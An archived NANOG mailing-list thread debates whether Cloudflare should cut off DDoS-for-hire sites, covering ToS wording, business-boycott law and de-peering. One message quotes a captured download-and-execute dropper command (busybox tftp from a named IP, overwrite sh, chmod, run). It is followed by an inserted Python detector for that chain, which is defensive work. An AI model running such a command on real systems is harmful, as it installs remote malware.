Re: Cloudflare, dirty networks and politricks

2016-08-01 Thread John
On 2016-08-01 13:20, Baldur Norddahl wrote:
> On 2016-07-31 05:46, Randy Bush wrote:
>>> This is silly. Anyone is of course allowed to deny service to parties
>>> involved in obvious criminal activity.
>> so block cloudflare from your network and go back to work already.
>>
>> randy

> I do believe that most of us on this list have cause to do that civil
> lawsuit, especially if it was done as a class action. But I just own a
> small company that is not even based in the US, so I am not going to
> be the hero that funds it. Instead I will do what I can to warn
> everyone off this company.
>
> Regards,
>
> Baldur
I think even you will win in court

The Russian government implemented a country-wide blocklist a while ago. It is
transparent and available online, and there
are a lot of Cloudflare IPs (http://reestr.rublacklist.net/api/ips). At first
I thought, again Putin's regime cracking down on freedom, but after viewing a
specific Cloudflare subnet as an example (
http://reestr.rublacklist.net/search/1?q=104.16.) I can say the major part of
the websites are online gambling, and many of them have court decisions. There
is also some ISIL propaganda, questionable nudes of underage (they pretend
to be art), drug dealers' forums (all in Russian language), etc.
As far as I know the Russians send a first abuse letter, and if such content is
not removed in reasonable terms, they block the resource on the "Russian
firewall". And I believe ignorance hurts Cloudflare's business in Russia, but
do they care?
I may understand the much more proper position of Google; for example, if they
receive a court order from Russia, they block this particular content in
Russia only. But they won't back down on their position on free speech. And they
are able to clearly draw a line between free speech and criminals.
OK, let's say on booters there is no court decision and it is a gray area. But
providing connectivity for terrorist propaganda or very questionable
content is beyond my understanding. Sure, I leave a chance that they didn't
receive notification from officials, but at least now they are aware of
this.


Re: Cloudflare, dirty networks and politricks

2016-08-01 Thread Alain Hebert
While on that subject,

( And by pure coincidence )

Here is a little attempt at exploiting an overflow (dnsmasq maybe)
using OVH as a payload distribution

 cd /tmp || cd /var/ || cd /dev/;busybox tftp -r min -g 91.134.141.49;cp /bin/sh .;cat min >sh;chmod 777 sh;./sh

Obviously that host is not accessible at the moment. (GG OVH?)

I'm suspecting that the CC used to create that VM got declined on
the 1st, which is often the case for payload distribution.

-
Alain Hebert                                aheb...@pubnix.net
PubNIX Inc.
50 boul. St-Charles
P.O. Box 26770 Beaconsfield, Quebec H9W 6G7
Tel: 514-990-5911  http://www.pubnix.net  Fax: 514-990-9443

On 08/01/16 07:33, Randy Bush wrote:
>>> so block cloudflare from your network and go back to work already.
>> What is that supposed to accomplish? Cloudflare will still be helping 
>> selling DDoS attacks on my network.
>>
>> No it is not the same as asking Cloudflare to do the sensible thing:
> and how is that working out for you?
>
> all that is happening is the subject that won't die is being a dos on
> this list (yes, including this response)
>
> randy
>
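A defender-side check for the command chain quoted in Alain Hebert's message, as an added example that is not part of the original thread: it follows the downloaded file through the chain and flags the fetch, mark-executable, run sequence. The function names and the benign sample line are constructed for illustration; the first sample is the command from the message.

```python
import re
import shlex

STAGING_DIRS = {"/tmp", "/var", "/dev"}  # the directories the captured command tries

# The command from the message, and a constructed benign line for contrast.
CAPTURED = ("cd /tmp || cd /var/ || cd /dev/;busybox tftp -r min -g "
            "91.134.141.49;cp /bin/sh .;cat min >sh;chmod 777 sh;./sh")
BENIGN = "cd /tmp; tftp -r switch.cfg -g 192.0.2.10; cat switch.cfg"


def split_chain(cmdline):
    """Split a shell line into simple commands on ';', '&&' and '||'."""
    return [c.strip() for c in re.split(r";|&&|\|\|", cmdline) if c.strip()]


def parse_simple(command):
    """Return (argv, redirect_targets) for one simple command."""
    try:
        tokens = shlex.split(command)
    except ValueError:               # unbalanced quotes in a mangled log line
        tokens = command.split()
    argv, targets, i = [], [], 0
    while i < len(tokens):
        m = re.fullmatch(r"\d*>{1,2}(.*)", tokens[i])
        if m:                        # ">file", ">> file", "2>file"
            name = m.group(1)
            if not name and i + 1 < len(tokens):
                i += 1
                name = tokens[i]
            if name:
                targets.append(name)
        else:
            argv.append(tokens[i])
        i += 1
    if len(argv) > 1 and argv[0].endswith("busybox"):
        argv = argv[1:]              # "busybox tftp ..." runs the tftp applet
    return argv, targets


def parse_tftp(args):
    """Read busybox-style tftp options: -g (get), -r REMOTE, -l LOCAL, HOST."""
    get, remote, local, host = False, None, None, None
    it = iter(args)
    for a in it:
        if a.startswith("-") and len(a) > 1:
            for flag in a[1:]:       # also copes with combined flags like -gr
                if flag == "g":
                    get = True
                elif flag == "r":
                    remote = next(it, None)
                elif flag == "l":
                    local = next(it, None)
        elif host is None:
            host = a
    # Without -l the local file takes the remote file's name.
    return get, remote, local or remote, host


def analyse(cmdline):
    """Trace remote content through a command chain; flag fetch -> chmod -> run."""
    r = {"staging_dirs": [], "host": None, "remote_file": None,
         "tainted": set(), "made_executable": set(), "executed": None}
    for command in split_chain(cmdline):
        argv, targets = parse_simple(command)
        if not argv:
            continue
        tool, args = argv[0], argv[1:]
        reads_tainted = any(a in r["tainted"] for a in args)
        if tool == "cd" and args and args[0].rstrip("/") in STAGING_DIRS:
            r["staging_dirs"].append(args[0].rstrip("/"))
        elif tool == "tftp":
            get, remote, local, host = parse_tftp(args)
            if get and local:
                r["host"], r["remote_file"] = host, remote
                r["tainted"].add(local)          # file now holds remote content
        elif tool == "cp" and len(args) >= 2 and args[-2] in r["tainted"]:
            r["tainted"].add(args[-1])
        elif tool == "chmod" and len(args) >= 2:
            r["made_executable"].update(args[1:])
        elif tool.startswith("./"):
            name = tool[2:]
            if name in r["tainted"] and name in r["made_executable"]:
                r["executed"] = tool
        if reads_tainted:
            # Output redirected from a command that names a tainted file
            # ("cat min >sh") carries the remote content into the target.
            r["tainted"].update(targets)
    r["download_and_execute"] = bool(r["host"] and r["executed"])
    return r


if __name__ == "__main__":
    for line in (CAPTURED, BENIGN):
        print(analyse(line))
```

The same function can be run over command strings pulled from process-audit or honeypot logs; only the tftp form of the fetch step is recognised here.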



Re: Cloudflare, dirty networks and politricks

2016-08-01 Thread Randy Bush
>> so block cloudflare from your network and go back to work already.
> 
> What is that supposed to accomplish? Cloudflare will still be helping 
> selling DDoS attacks on my network.
> 
> No it is not the same as asking Cloudflare to do the sensible thing:

and how is that working out for you?

all that is happening is the subject that won't die is being a dos on
this list (yes, including this response)

randy


Re: Cloudflare, dirty networks and politricks

2016-08-01 Thread Baldur Norddahl



On 2016-07-31 05:46, Randy Bush wrote:
>> This is silly. Anyone is of course allowed to deny service to parties
>> involved in obvious criminal activity.
> so block cloudflare from your network and go back to work already.
>
> randy


What is that supposed to accomplish? Cloudflare will still be helping 
selling DDoS attacks on my network.


No it is not the same as asking Cloudflare to do the sensible thing:

Cloudflare profits on DDoS attacks. We are the victims.

Cloudflare can dump just the obvious criminal customers. The ones they 
got abuse complaints about so they know which ones to look at. If we 
block Cloudflare there will be collateral damage to all legit Cloudflare 
customers and our own customers using services from legit Cloudflare 
customers.


Asking me to do anything at all is like telling the rape victim to take 
care of the problem herself. Cloudflare is the wrongdoing party here, 
not us.


Blocking Cloudflare does not stop the attacks. If Cloudflare stops 
offering protection service to booters, those sites will find it very 
hard to find alternatives. There is a reason they all are using 
Cloudflare. Thus if Cloudflare boots the booters we will very likely see 
a decrease in attacks.


My preferred solution is that management of Cloudflare decides to make 
their company an honest outfit again. Failing that, I would like law 
enforcement to coerce them into becoming an honest outfit. Failing that, 
I would want a judge in a civil lawsuit to coerce them.


I do believe that most of us on this list have cause to do that civil 
lawsuit, especially if it was done as a class action. But I just own a 
small company that is not even based in the US, so I am not going to be 
the hero that funds it. Instead I will do what I can to warn everyone 
off this company.


Regards,

Baldur



Re: Cloudflare, dirty networks and politricks

2016-07-31 Thread bzs

Besides legal costs I've informed customers that I will charge them
(insert billable hourly rate) for any complaints or similar our staff
has to field beyond what we'd consider a normal volume which is pretty
low.

One guy who wasn't quite to the level of spamming as usually
conceived, not in intent, but ran a professional content list but had
a bad habit of wholesale adding mail addresses -- this was quite a
while ago when such things weren't so clear. I finally billed him
~$1,000 after several warnings and he paid it and said he understood
that our time is worth money.

I kind of felt bad because I didn't believe his intentions were in any
way malicious. Mostly he'd scrape similarly themed lists and websites,
but we really were getting quite a few complaints per day some which
merited responses...and he did run the list to promote his own
consulting. But at some point time really is money.

I suppose that sort of thing could be used in a case like this where
someone hosts a web site of questionable intent but never uses your
service to actually do anything questionable. If it incurs you costs
such as telling people you're not the right party it seems reasonable
to expect reimbursement. I think the law uses the term "attractive
nuisance".

Which of course leads to shutting someone down if they refuse to pay.
Again you've reduced it to just a credit or payment issue rather than
citing the content specifically other than perhaps as an explanation
why you're getting too many complaints.

-- 
-Barry Shein

Software Tool & Die| b...@theworld.com | http://www.TheWorld.com
Purveyors to the Trade | Voice: +1 617-STD-WRLD   | 800-THE-WRLD
The World: Since 1989  | A Public Information Utility | *oo*


Re: Cloudflare, dirty networks and politricks

2016-07-31 Thread Rich Kulawiec
On Sat, Jul 30, 2016 at 03:34:32PM -0400, b...@theworld.com wrote:
> I don't know if one can write a ToS which says you will be shut down
> if you harm another party utilizing another party's services but not
> otherwise involving us. Well, you can write anything but is it lawful
> and enforceable?

Yes.  And it doesn't require that the activity be illegal, which is
a good thing because what most of us recognize as abusive may or
may not be illegal depending on which legal professional is interpreting
the law, which law they're interpreting, and what jurisdiction(s) apply.

I fired an 11-year customer in under an hour when I discovered them
spamming via one of the numerous spammers-for-hire out there.  This
activity had nothing to do with the services I was providing them,
but it fell under the provision that said (abbreviating liberally
from the legalese) "if you spam from anywhere, you're toast".
I didn't like doing it to a longtime customer, particularly because
they happened to be my biggest customer, but I did...because it
was the right thing to do, and because I had made it crystal-clear
to them when they signed on that I would do it without hesitation.

I expect the same from everyone else.  If I can do it without
the budgets, staff, and legal departments that so many far larger
operations enjoy, then so can they.  It's just a question of whether
or not they recognize their ethical, professional obligation to
the rest of the Internet and are willing to put that ahead of profit.

---rsk


Re: Cloudflare, dirty networks and politricks

2016-07-30 Thread Randy Bush
> This is silly. Anyone is of course allowed to deny service to parties
> involved in obvious criminal activity.

so block cloudflare from your network and go back to work already.

randy


Re: Cloudflare, dirty networks and politricks

2016-07-30 Thread Owen DeLong

> On Jul 30, 2016, at 12:34 PM, b...@theworld.com wrote:
> 
> 
> On July 30, 2016 at 10:51 o...@delong.com (Owen DeLong) wrote:
>> If they are using a website hosted or accelerated by your CDN to advertise
>> an illegal activity or an activity in violation of your ToS, then if you
>> have written your ToS properly, you are free to shut down said site (or
>> at least your portions of it) based on their violation of your ToS.
> 
> Well, yes, of course, which is why I suggested developing generally
> agreed upon definitions and writing them into contracts.
> 
> One can't really write a useful contract if terms aren't well defined.
> 
>> 
>> That’s not a business boycott because you didn’t conspire with their other
>> providers to shut it down, you took an independent action based on your
>> own ToS.
> 
> The issue arises if you shut them down when you're not the harmed or
> involved party.

Not if they are using your service in a way that is contrary to the agreement
they have signed.

> I don't know if one can write a ToS which says you will be shut down
> if you harm another party utilizing another party's services but not
> otherwise involving us. Well, you can write anything but is it lawful
> and enforceable?

Probably not, but you wouldn’t do that anyway.

What you would write instead is that “You shall not use the service to
carry out attacks or other malicious activity, nor shall you use the
service to advertise, solicit, or contract to carry out such actions even
if the actions themselves are carried out independent of the service.”

You can, of course, prohibit any action you want on your network, even
if the prohibited action isn’t the actual objectionable action.

> In some cases where that sort of thing has come up I've turned it into
> a credit relationship which has greater leeway.
> 
> Something like:
> 
>  It has come to our attention that you are engaged in activities,
>  even if not thus far involving our services, which might incur us
>  legal fees. Consequently we require a deposit to cover those legal
>  fees, in advance, of $10,000 [pick a number] with the understanding
>  that any such legal fees will be billable in full even if above and
>  beyond that $10,000 deposit. Since I extend you no credit a failure
>  to provide that deposit by [date in the near future] will result in
>  termination of services. Please feel free to contact us with any
>  questions or concerns.

Here you risk running up against a claim that this new requirement
is a change to the ToS which they haven’t agreed to and which,
depending on how well they negotiated the contract may not be
enforceable until it comes time for contract renewal and you add
this deposit to the terms of the new contract.

> but consult your attorney, state and local regulations and your own
> ToS and corporate organization may affect how and whether you can do
> that sort of thing or exactly how it has to be architected.

Always.

> If one wants to one can include demand for indemnification with
> evidence of ability to indemnify and/or business insurance policies
> where you've been written in as a legitimate potential claimant for
> legal fees and damages assuming the business insurance policy covers
> that but as I said you need a lawyer to suss that out.

Sure, but it’s questionable whether the aggrieved party has any legitimate
claim against the hosting company that merely hosted the site that
advertised the DDOS service in question.

Much easier to just prohibit advertising such a service in the first
place, IMHO.

> They probably could still fight with you over all that if none of it
> was anticipated in your ToS (hint: might be something to add to a ToS,
> reserving the right to...blah blah.) Or even try to perfect an
> argument based on some theory of estoppel (you changed the conditions
> in a way which harms me the client.)
> 
> More likely they'll ask for time and assistance to leave your service
> (in my experience), generally what you actually wanted. Buh-bye!

Yep… Unless they’re starting to run out of options.

>> There’s fairly wide latitude to “reserve the right to refuse service to
>> anyone”, especially if you can show that their use of said service is
>> in violation of the contract(s) applicable to that service.
> 
> Yeah well as any lawyer will tell you relying on broad principles like
> that rather than specifying covenants is just asking for legal fees :-)

Sure, but my point is that specifically spelling out certain actions that
you refuse to provide service to is usually the easiest way to terminate
someone for committing such actions on your service.

Owen

> 
>> 
>> Owen
>> 
>>> On Jul 29, 2016, at 12:36 , b...@theworld.com wrote:
>>> 
>>> 
>>> Unfortunately that raises the issue of what's generally termed in law
>>> a "business boycott" which is at least tortiable if not illegal.
>>> 
>>> The grocer can't agree with your landlord not to sell you food until
>>> you catch up on 

Re: Cloudflare, dirty networks and politricks

2016-07-30 Thread Baldur Norddahl
This is silly. Anyone is of course allowed to deny service to parties
involved in obvious criminal activity. Moreover, Cloudflare benefits from
this illegal activity that they allow on their service. In addition most
other services disallow the same illegal sites. This can only lead to one
conclusion.

Regards

Baldur

On 30 Jul 2016 at 21:36, wrote:

>
> On July 30, 2016 at 10:51 o...@delong.com (Owen DeLong) wrote:
>  > If they are using a website hosted or accelerated by your CDN to
> advertise
>  > an illegal activity or an activity in violation of your ToS, then if you
>  > have written your ToS properly, you are free to shut down said site (or
>  > at least your portions of it) based on their violation of your ToS.
>
> Well, yes, of course, which is why I suggested developing generally
> agreed upon definitions and writing them into contracts.
>
> One can't really write a useful contract if terms aren't well defined.
>
>  >
>  > That’s not a business boycott because you didn’t conspire with their
> other
>  > providers to shut it down, you took an independent action based on your
>  > own ToS.
>
> The issue arises if you shut them down when you're not the harmed or
> involved party.
>
> I don't know if one can write a ToS which says you will be shut down
> if you harm another party utilizing another party's services but not
> otherwise involving us. Well, you can write anything but is it lawful
> and enforceable?
>
> In some cases where that sort of thing has come up I've turned it into
> a credit relationship which has greater leeway.
>
> Something like:
>
>   It has come to our attention that you are engaged in activities,
>   even if not thus far involving our services, which might incur us
>   legal fees. Consequently we require a deposit to cover those legal
>   fees, in advance, of $10,000 [pick a number] with the understanding
>   that any such legal fees will be billable in full even if above and
>   beyond that $10,000 deposit. Since I extend you no credit a failure
>   to provide that deposit by [date in the near future] will result in
>   termination of services. Please feel free to contact us with any
>   questions or concerns.
>
> but consult your attorney, state and local regulations and your own
> ToS and corporate organization may affect how and whether you can do
> that sort of thing or exactly how it has to be architected.
>
> If one wants to one can include demand for indemnification with
> evidence of ability to indemnify and/or business insurance policies
> where you've been written in as a legitimate potential claimant for
> legal fees and damages assuming the business insurance policy covers
> that but as I said you need a lawyer to suss that out.
>
> They probably could still fight with you over all that if none of it
> was anticipated in your ToS (hint: might be something to add to a ToS,
> reserving the right to...blah blah.) Or even try to perfect an
> argument based on some theory of estoppel (you changed the conditions
> in a way which harms me the client.)
>
> More likely they'll ask for time and assistance to leave your service
> (in my experience), generally what you actually wanted. Buh-bye!
>
>  >
>  > There’s fairly wide latitude to “reserve the right to refuse service to
>  > anyone”, especially if you can show that their use of said service is
>  > in violation of the contract(s) applicable to that service.
>
> Yeah well as any lawyer will tell you relying on broad principles like
> that rather than specifying covenants is just asking for legal fees :-)
>
>  >
>  > Owen
>  >
>  > > On Jul 29, 2016, at 12:36 , b...@theworld.com wrote:
>  > >
>  > >
>  > > Unfortunately that raises the issue of what's generally termed in law
>  > > a "business boycott" which is at least tortiable if not illegal.
>  > >
>  > > The grocer can't agree with your landlord not to sell you food until
>  > > you catch up on the rent.
>  > >
>  > > They can agree to use this information to refuse you credit but even
>  > > that's quite constrained by law even if often done anyhow. And that's
>  > > a credit relationship so different.
>  > >
>  > > I went over this with my attorney when another ISP asked me to shut a
>  > > customer's account down because they were spamming them from a third
>  > > ISP's account.
>  > >
>  > > I asked to look at the emails (spam) in question and none originated
>  > > at our site. The acct in question on my site didn't do anything
>  > > problematic that I could find.
>  > >
>  > > My lawyer explained the above to me: You can't do that, business
>  > > boycott.
>  > >
>  > > The other ISP (specifically a sysadmin) who'd asked me to shut the
>  > > acct got so angry at this response, he took it all very personally and
>  > > unprofessionally, that I had to bring in his own legal dept to explain
>  > > this to him which he of course took as a further affront. It got ugly
>  > > but you don't need the details.
>  > >
>  > > That's the problem 

Re: Cloudflare, dirty networks and politricks

2016-07-30 Thread bzs

On July 30, 2016 at 10:51 o...@delong.com (Owen DeLong) wrote:
 > If they are using a website hosted or accelerated by your CDN to advertise
 > an illegal activity or an activity in violation of your ToS, then if you
 > have written your ToS properly, you are free to shut down said site (or
 > at least your portions of it) based on their violation of your ToS.

Well, yes, of course, which is why I suggested developing generally
agreed upon definitions and writing them into contracts.

One can't really write a useful contract if terms aren't well defined.

 > 
 > That’s not a business boycott because you didn’t conspire with their other
 > providers to shut it down, you took an independent action based on your
 > own ToS.

The issue arises if you shut them down when you're not the harmed or
involved party.

I don't know if one can write a ToS which says you will be shut down
if you harm another party utilizing another party's services but not
otherwise involving us. Well, you can write anything but is it lawful
and enforceable?

In some cases where that sort of thing has come up I've turned it into
a credit relationship which has greater leeway.

Something like:

  It has come to our attention that you are engaged in activities,
  even if not thus far involving our services, which might incur us
  legal fees. Consequently we require a deposit to cover those legal
  fees, in advance, of $10,000 [pick a number] with the understanding
  that any such legal fees will be billable in full even if above and
  beyond that $10,000 deposit. Since I extend you no credit a failure
  to provide that deposit by [date in the near future] will result in
  termination of services. Please feel free to contact us with any
  questions or concerns.

but consult your attorney, state and local regulations and your own
ToS and corporate organization may affect how and whether you can do
that sort of thing or exactly how it has to be architected.

If one wants to one can include demand for indemnification with
evidence of ability to indemnify and/or business insurance policies
where you've been written in as a legitimate potential claimant for
legal fees and damages assuming the business insurance policy covers
that but as I said you need a lawyer to suss that out.

They probably could still fight with you over all that if none of it
was anticipated in your ToS (hint: might be something to add to a ToS,
reserving the right to...blah blah.) Or even try to perfect an
argument based on some theory of estoppel (you changed the conditions
in a way which harms me the client.)

More likely they'll ask for time and assistance to leave your service
(in my experience), generally what you actually wanted. Buh-bye!

 > 
 > There’s fairly wide latitude to “reserve the right to refuse service to
 > anyone”, especially if you can show that their use of said service is
 > in violation of the contract(s) applicable to that service.

Yeah well as any lawyer will tell you relying on broad principles like
that rather than specifying covenants is just asking for legal fees :-)

 > 
 > Owen
 > 
 > > On Jul 29, 2016, at 12:36 , b...@theworld.com wrote:
 > > 
 > > 
 > > Unfortunately that raises the issue of what's generally termed in law
 > > a "business boycott" which is at least tortiable if not illegal.
 > > 
 > > The grocer can't agree with your landlord not to sell you food until
 > > you catch up on the rent.
 > > 
 > > They can agree to use this information to refuse you credit but even
 > > that's quite constrained by law even if often done anyhow. And that's
 > > a credit relationship so different.
 > > 
 > > I went over this with my attorney when another ISP asked me to shut a
 > > customer's account down because they were spamming them from a third
 > > ISP's account.
 > > 
 > > I asked to look at the emails (spam) in question and none originated
 > > at our site. The acct in question on my site didn't do anything
 > > problematic that I could find.
 > > 
 > > My lawyer explained the above to me: You can't do that, business
 > > boycott.
 > > 
 > > The other ISP (specifically a sysadmin) who'd asked me to shut the
 > > acct got so angry at this response, he took it all very personally and
 > > unprofessionally, that I had to bring in his own legal dept to explain
 > > this to him which he of course took as a further affront. It got ugly
 > > but you don't need the details.
 > > 
 > > That's the problem with all this folksy armchair "law", it's often
 > > very bad advice and based on the assumption that the law must agree
 > > with one's emotional feelings. Good luck with that.
 > > 
 > > On July 29, 2016 at 08:08 r...@gsp.org (Rich Kulawiec) wrote:
 > >> On Thu, Jul 28, 2016 at 11:30:12PM +, Donn Lasher via NANOG wrote:
 > >>> If we want to be accurate about it, Cloudflare doesn't host the DDoS,
 > >>> they protect the website of seller of the product. We shouldn't be
 > >>> de-peering Cloud Flare over sites they protect any more 

Re: Cloudflare, dirty networks and politricks

2016-07-30 Thread Owen DeLong
If they are using a website hosted or accelerated by your CDN to advertise
an illegal activity or an activity in violation of your ToS, then if you
have written your ToS properly, you are free to shut down said site (or
at least your portions of it) based on their violation of your ToS.

That’s not a business boycott because you didn’t conspire with their other
providers to shut it down, you took an independent action based on your
own ToS.

There’s fairly wide latitude to “reserve the right to refuse service to
anyone”, especially if you can show that their use of said service is
in violation of the contract(s) applicable to that service.

Owen

> On Jul 29, 2016, at 12:36 , b...@theworld.com wrote:
> 
> 
> Unfortunately that raises the issue of what's generally termed in law
> a "business boycott" which is at least tortiable if not illegal.
> 
> The grocer can't agree with your landlord not to sell you food until
> you catch up on the rent.
> 
> They can agree to use this information to refuse you credit but even
> that's quite constrained by law even if often done anyhow. And that's
> a credit relationship so different.
> 
> I went over this with my attorney when another ISP asked me to shut a
> customer's account down because they were spamming them from a third
> ISP's account.
> 
> I asked to look at the emails (spam) in question and none originated
> at our site. The acct in question on my site didn't do anything
> problematic that I could find.
> 
> My lawyer explained the above to me: You can't do that, business
> boycott.
> 
> The other ISP (specifically a sysadmin) who'd asked me to shut the
> acct got so angry at this response, he took it all very personally and
> unprofessionally, that I had to bring in his own legal dept to explain
> this to him which he of course took as a further affront. It got ugly
> but you don't need the details.
> 
> That's the problem with all this folksy armchair "law", it's often
> very bad advice and based on the assumption that the law must agree
> with one's emotional feelings. Good luck with that.
> 
> On July 29, 2016 at 08:08 r...@gsp.org (Rich Kulawiec) wrote:
>> On Thu, Jul 28, 2016 at 11:30:12PM +, Donn Lasher via NANOG wrote:
>>> If we want to be accurate about it, Cloudflare doesn't host the DDoS,
>>> they protect the website of seller of the product. We shouldn't be
>>> de-peering Cloud Flare over sites they protect any more than we would
>>> de-peer GoDaddy over sites they host, some of which, no doubt, sell
>>> gray/black market/illegal items/services.
>> 
>> This strategy fails for two reasons.
>> 
>> First, nobody gets a pass.  Anybody providing services to abusers
>> needs to cut them off, whether it's a registrar, a web host, an email
>> provider, a DNS provider, or anything else.  Nobody gets to shrug it
>> off with "Well, but..."
>> 
>> Second, nobody *can* get a pass, because the people behind these operations
>> have long since learned to distribute their assets widely -- in an attempt
>> to avoid exactly the actions in the first point.  And you know what?
>> It works.  "We're just hosting their email", says X, and "We're just
>> hosting their DNS", says Y, and "We're just hosting their web site",
>> says Z, and none of them do anything, and nothing gets done. 
>> 
>> The only way to make action against them effective is to do it broadly,
>> do it swiftly, and do it permanently.
>> 
>> ---rsk
> 
> -- 
>-Barry Shein
> 
> Software Tool & Die| b...@theworld.com | http://www.TheWorld.com
> Purveyors to the Trade | Voice: +1 617-STD-WRLD   | 800-THE-WRLD
> The World: Since 1989  | A Public Information Utility | *oo*



Re: Cloudflare, dirty networks and politricks

2016-07-29 Thread Valdis . Kletnieks
On Fri, 29 Jul 2016 07:50:09 -0500, "J. Oquendo" said:

> In my ramblings on "Why network operators love filth", I
> associate a landlord that knowingly allows his/her tenant
> to sell drugs. In America, your house is gone. This should
> be the case on the Internet as well.

Oh, do *NOT* go there.  In America, "Civil forfeiture" is a *major*
out-of-control problem, because it is *not* done with any sort of judicial
review *at all*.  The police department simply seizes your house/car/etc
on *suspicion* of being involved with drugs or whatever - there doesn't
even need to be an arrest of anybody.

That's right - they can suspect you of dealing drugs, but not have enough
evidence to arrest you.  But they can take your car away anyhow.  It's
called "stop and seize".

They can take your car away because you loaned it to your brother-in-law
to go shopping, because they suspect *he* deals drugs.  The car doesn't
have to be involved in travelling to a drug deal.

Oh, and in most cases, the police department gets to *keep* the proceeds
(money, cars - often sold at auction for more money, etc) of the forfeiture.
This of course makes their budget look better.

The end result - in the US, in 2014, the police took more money and assets
from people than all the reported robberies for the year.

http://www.zerohedge.com/news/2015-11-17/police-civil-asset-forfeitures-exceed-value-all-burglaries-2014

I sincerely *hope* that isn't how you want a global Internet run.




Re: Cloudflare, dirty networks and politricks

2016-07-29 Thread bzs

Unfortunately that raises the issue of what's generally termed in law
a "business boycott" which is at least tortiable if not illegal.

The grocer can't agree with your landlord not to sell you food until
you catch up on the rent.

They can agree to use this information to refuse you credit but even
that's quite constrained by law even if often done anyhow. And that's
a credit relationship so different.

I went over this with my attorney when another ISP asked me to shut a
customer's account down because they were spamming them from a third
ISP's account.

I asked to look at the emails (spam) in question and none originated
at our site. The acct in question on my site didn't do anything
problematic that I could find.

My lawyer explained the above to me: You can't do that, business
boycott.

The other ISP (specifically a sysadmin) who'd asked me to shut the
acct got so angry at this response, he took it all very personally and
unprofessionally, that I had to bring in his own legal dept to explain
this to him which he of course took as a further affront. It got ugly
but you don't need the details.

That's the problem with all this folksy armchair "law", it's often
very bad advice and based on the assumption that the law must agree
with one's emotional feelings. Good luck with that.

On July 29, 2016 at 08:08 r...@gsp.org (Rich Kulawiec) wrote:
 > On Thu, Jul 28, 2016 at 11:30:12PM +, Donn Lasher via NANOG wrote:
 > > If we want to be accurate about it, Cloudflare doesn't host the DDoS,
 > > they protect the website of seller of the product. We shouldn't be
 > > de-peering Cloud Flare over sites they protect any more than we would
 > > de-peer GoDaddy over sites they host, some of which, no doubt, sell
 > > gray/black market/illegal items/services.
 > 
 > This strategy fails for two reasons.
 > 
 > First, nobody gets a pass.  Anybody providing services to abusers
 > needs to cut them off, whether it's a registrar, a web host, an email
 > provider, a DNS provider, or anything else.  Nobody gets to shrug it
 > off with "Well, but..."
 > 
 > Second, nobody *can* get a pass, because the people behind these operations
 > have long since learned to distribute their assets widely -- in an attempt
 > to avoid exactly the actions in the first point.  And you know what?
 > It works.  "We're just hosting their email", says X, and "We're just
 > hosting their DNS", says Y, and "We're just hosting their web site",
 > says Z, and none of them do anything, and nothing gets done. 
 > 
 > The only way to make action against them effective is to do it broadly,
 > do it swiftly, and do it permanently.
 > 
 > ---rsk

-- 
-Barry Shein

Software Tool & Die| b...@theworld.com | http://www.TheWorld.com
Purveyors to the Trade | Voice: +1 617-STD-WRLD   | 800-THE-WRLD
The World: Since 1989  | A Public Information Utility | *oo*


Re: Cloudflare, dirty networks and politricks

2016-07-29 Thread Hugo Slabbert


On Fri 2016-Jul-29 07:50:09 -0500, J. Oquendo  wrote:

> On Fri, 29 Jul 2016, Rich Kulawiec wrote:
>
> > On Thu, Jul 28, 2016 at 11:30:12PM +, Donn Lasher via NANOG wrote:
> > > If we want to be accurate about it, Cloudflare doesn’t host the DDoS,
> > > they protect the website of seller of the product. We shouldn’t be
> > > de-peering Cloud Flare over sites they protect any more than we would
> > > de-peer GoDaddy over sites they host, some of which, no doubt, sell
> > > gray/black market/illegal items/services.
> >
> > The only way to make action against them effective is to do it broadly,
> > do it swiftly, and do it permanently.
>
> In my ramblings on "Why network operators love filth", I
> associate a landlord that knowingly allows his/her tenant
> to sell drugs. In America, your house is gone. This should
> be the case on the Internet as well. Keep sending out crap
> and ARIN should yank your IP space after everyone else
> has de-peered you.
>
> So let's get to these horrible analogies of "weapons" and
> whether or not CloudFlare is solely the gun manufacturer
> and is not responsible whether or not their ARCLOUD rifle
> was used to shoot up a school killing children.
>
> Analogy: Hotel Cloud is a pretty big hotel in the city.
> They have 5,000 rooms. When you walk by, their tenants
> are throwing rocks out of the windows, garbage, etc.
> People complain to the hotel management that does nothing
> about it. Hotel Cloud's response is: 'Well this is really
> not our problem, we only rent a room, what the occupant
> does...' --- And this makes sense to how many of you who'd
> respond: "Well I don't know about you but I want to walk
> around freely" Freely? At some point in time, you WILL
> walk by this hotel, or another that WILL become just like
> it. Why? Because there will be no one to say: "Hey this
> is wrong buck stops here..."
>
> I have seen these discussions on this list for so many
> years, and there are those that want to do good, but won't
> lift a finger out of fear of the herd/praetorian guard.
> Anyone saying it cannot be done, is a coward bowing to
> the dollar (euro/yen/whatever). The analogy above is spot
> on...


This may seem pedantic, but no it's not, at least not in the Cloudflare 
situation.  In the Hotel Cloudflare example, the miscreants don't hurl the 
rocks and filth out of the hotels' windows.  They set up a storefront/shop 
in the hotel to sell rock- and filth-slinging for hire, with the actual 
rock- and filth-flinging being done elsewhere.


That said:

I don't believe the hotel can turn a blind eye to rock- and filth-slinging 
being peddled from their premises without consequence.  If we caught 
someone running a booter web storefront on our net, they'd be gone.  And 
the premises from which rock- and filth-slinging occurs (networks that 
originate garbage traffic, especially those that permit source address 
spoofing) also need to be held accountable.


Again: not disagreeing that we need to hold people accountable; just 
clarifying the analogy for this case.


I've cut off service for customer gear that was spewing garbage where they 
failed to do anything about it.  We generally give an initial grace period 
and assist the customer however we can in getting their stuff cleaned up 
(or try to drop just the abusive traffic to start and leave the rest of 
their feed).  But if you keep getting repeatedly compromised, fail to 
protect your stuff or clean it up, and keep spewing ever more varied 
garbage, you've proven yourself incapable of running an Internet-facing 
service and I'll quit trying to play whack-a-mole and just drop you.


And yes:
BCP38: we haz it.

We're not at the scale of the big boys, but we try to do our part to run a 
clean shop.



> ...with the only difference being a hotel is physical,
> and on the Interwebs, out of sight out of mind.
>
> This is until one of your relatives' sites gets taken offline by
> some bored moron via DDoS, and there go their sales, there
> goes their business. THEN and only THEN will some of the
> naysayers say: "Shit we could have stopped it."
>
> Do you need law enforcement to be moral? "I can see
> that person is getting pulverized by some drunken idiot
> better not intervene because well... I want to walk
> freely..." That beating can come full circle, where
> beating can be DDoS, a sophisticated attack, malware.
>
> I am so tempted to start a shaming site for networks
> including all of the big boys with detailed records
> showing how abuse was contacted, no one did nothing,
> and oh by the way... "Are you sure you want to host
> or transit with this company? Last I checked via
> logs, they were a filthy network that catered to
> peds, RBN folk, etc" Maybe when some of you guys
> (that sit around twiddling fingers) see your companies
> all over the place, maybe then you'll think about doing
> the right thing.
>
